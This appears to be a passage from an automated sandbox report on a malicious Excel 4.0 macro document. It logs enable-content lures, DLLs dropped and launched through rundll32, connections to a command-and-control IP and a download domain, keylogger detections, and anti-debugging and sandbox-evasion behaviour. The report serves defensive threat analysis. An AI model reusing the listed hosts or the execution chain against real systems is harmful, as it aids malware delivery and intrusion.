Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: rundll32.exe, 00000004.00000003.2166659967.00000000002DA000.00000004.00000001.sdmp String found in binary or memory: https://52.12.4.186/5B
Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp String found in binary or memory: https://52.12.4.186/h
Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp String found in binary or memory: https://52.12.4.186/news/update
Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp String found in binary or memory: https://52.12.4.186/news/update6
Source: rundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmp String found in binary or memory: https://52.12.4.186/news/updateA
Source: rundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmp String found in binary or memory: https://52.12.4.186/news/updateF
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.hu/docs/
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown HTTPS traffic detected: 104.21.3.47:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.12.4.186:443 -> 192.168.2.22:49170 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp Binary or memory string: DirectDrawCreateEx
Installs a raw input device (often for capturing keystrokes)
Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp Binary or memory string: GetRawInputData
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1108, type: MEMORY

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 Protected View
Source: Screenshot number: 4 Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start . the decryption of the docum
Source: Screenshot number: 8 Screenshot OCR: Enable editing Windowscan check onlinefora solution tothe problem. ernet. 13 14 Protected View Thi
Source: Document image extraction number: 2 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2 Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3 Screenshot OCR: Enable Content
Source: Document image extraction number: 4 Screenshot OCR: Enable Editing
Source: Document image extraction number: 13 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13 Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Screenshot number: 12 Screenshot OCR: Enable editing Windowscan check onlinefora solution tothe problem. ernet. 13 14 Protected View Thi
Found Excel 4.0 Macro with suspicious formulas
Source: Documents_460000622_1464906353.xls Initial sample: EXEC
Source: Documents_460000622_1464906353.xls Initial sample: CALL
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ndgfht.frg Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll Jump to dropped file
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E777A4B NtQueryInformationProcess, 4_2_6E777A4B
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E783C31 4_2_6E783C31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7A9E50 4_2_6E7A9E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E5FFD 4_2_6E7E5FFD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7F3FDF 4_2_6E7F3FDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7F0C10 4_2_6E7F0C10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E5DC3 4_2_6E7E5DC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7A8A70 4_2_6E7A8A70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E5B94 4_2_6E7E5B94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E595A 4_2_6E7E595A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7D665D 4_2_6E7D665D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7F0760 4_2_6E7F0760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E79A730 4_2_6E79A730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E572B 4_2_6E7E572B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E6723 4_2_6E7E6723
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E64C6 4_2_6E7E64C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7ED5DE 4_2_6E7ED5DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E625A 4_2_6E7E625A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E79C2D0 4_2_6E79C2D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7FB360 4_2_6E7FB360
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7D83F0 4_2_6E7D83F0
Document contains embedded VBA macros
Source: Documents_460000622_1464906353.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E7794D0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E7D4553 appears 73 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E7D4E40 appears 54 times
Yara signature match
Source: Documents_460000622_1464906353.xls, type: SAMPLE Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.expl.evad.winXLS@7/12@1/2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E777B4D CoCreateInstance, 4_2_6E777B4D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{ce7c126a-cd42-45d2-8a55-1f743478800b}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{395c2195-6d12-42eb-b952-6aae2e230819}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD7B8.tmp Jump to behavior
Source: Documents_460000622_1464906353.xls OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wininet.pdb source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb;Y source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000004.00000003.2166262652.0000000002531000.00000004.00000001.sdmp
Source: Binary string: c:\over\sat\63_Safe\tra\fell\clear.pdb source: rundll32.exe, 00000004.00000002.2257199515.000000006E815000.00000002.00020000.sdmp, ndgfht.frg.0.dr
Source: Binary string: shell32.pdb9 source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.2163524826.0000000002430000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb source: rundll32.exe, 00000004.00000003.2163347382.0000000002430000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E784371 push ecx; ret 4_2_6E784384
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E792E8F push ss; retf 4_2_6E792EAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7D4E86 push ecx; ret 4_2_6E7D4E99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7926ED push esp; retf 4_2_6E7926FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7D451C push ecx; ret 4_2_6E7D452F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E79521B push esp; ret 4_2_6E79521C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E791047 push esp; retf 4_2_6E79108E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E794020 push cs; ret 4_2_6E794041

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ndgfht.frg Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ndgfht.frg Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ndgfht.frg Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ndgfht.frg Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp Binary or memory string: CDB.EXEWINDBG.EXE
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77F61E FindFirstFileExW, 4_2_6E77F61E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E802EC8 FindFirstFileExA, 4_2_6E802EC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E803336 FindFirstFileExA, 4_2_6E803336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E803361 FindFirstFileExW, 4_2_6E803361

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77D332 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E77D332
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77F248 mov eax, dword ptr fs:[00000030h] 4_2_6E77F248
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77C61C mov eax, dword ptr fs:[00000030h] 4_2_6E77C61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7F4D21 mov eax, dword ptr fs:[00000030h] 4_2_6E7F4D21
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77865C GetProcessHeap,InternetQueryDataAvailable, 4_2_6E77865C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77D332 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E77D332
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E778FBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_6E778FBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7791BB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E7791BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7D4A3C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E7D4A3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7D4728 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_6E7D4728
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E9302 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E7E9302

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.12.4.186 187 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: Documents_460000622_1464906353.xls, type: SAMPLE
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp Binary or memory string: FoldersAppPropertiesPROGMAN
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp Binary or memory string: GetProgmanWindow
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp Binary or memory string: ProgmanProgman3
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp Binary or memory string: IMECreateGroupShowGroupAddItemExitProgmanDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileDDEClientddeClassccInsDDEBWWFrameDDEClientWndClassBACKSCAPE#32770SenderCA_DDECLASSInstallMake Program Manager GroupViewFolderExploreFolder
Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp Binary or memory string: SetProgmanWindow

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7792E1 cpuid 4_2_6E7792E1
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 4_2_6E806E8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E7FBF12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E7FBFFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 4_2_6E806CB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 4_2_6E806DC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 4_2_6E806B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E8068B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E806818
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 4_2_6E7FC8E3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 4_2_6E7C190C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E8067AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoEx, 4_2_6E7D3576
Source: C:\Windows\SysWOW64\rundll32.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 4_2_6E806537
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E779516 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 4_2_6E779516
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E802845 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 4_2_6E802845
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 383422 Sample: Documents_460000622_1464906... Startdate: 07/04/2021 Architecture: WINDOWS Score: 100 31 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->31 33 Document exploit detected (drops PE files) 2->33 35 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->35 37 5 other signatures 2->37 8 EXCEL.EXE 90 46 2->8         started        process3 dnsIp4 25 whiskyexpanse.com 104.21.3.47, 443, 49167 CLOUDFLARENETUS United States 8->25 21 C:\Users\user\ndgfht.frg, PE32 8->21 dropped 23 C:\Users\user\AppData\Local\...\ohior[1].dll, PE32 8->23 dropped 39 Document exploit detected (creates forbidden files) 8->39 41 Document exploit detected (UrlDownloadToFile) 8->41 13 rundll32.exe 8->13         started        file5 signatures6 process7 process8 15 rundll32.exe 12 13->15         started        dnsIp9 27 52.12.4.186, 443, 49170, 49172 AMAZON-02US United States 15->27 29 System process connects to network (likely due to code injection or exploit) 15->29 19 cmd.exe 15->19         started        signatures10 process11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
52.12.4.186
 unknown United States
16509 AMAZON-02US true
104.21.3.47
 whiskyexpanse.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
whiskyexpanse.com 104.21.3.47 true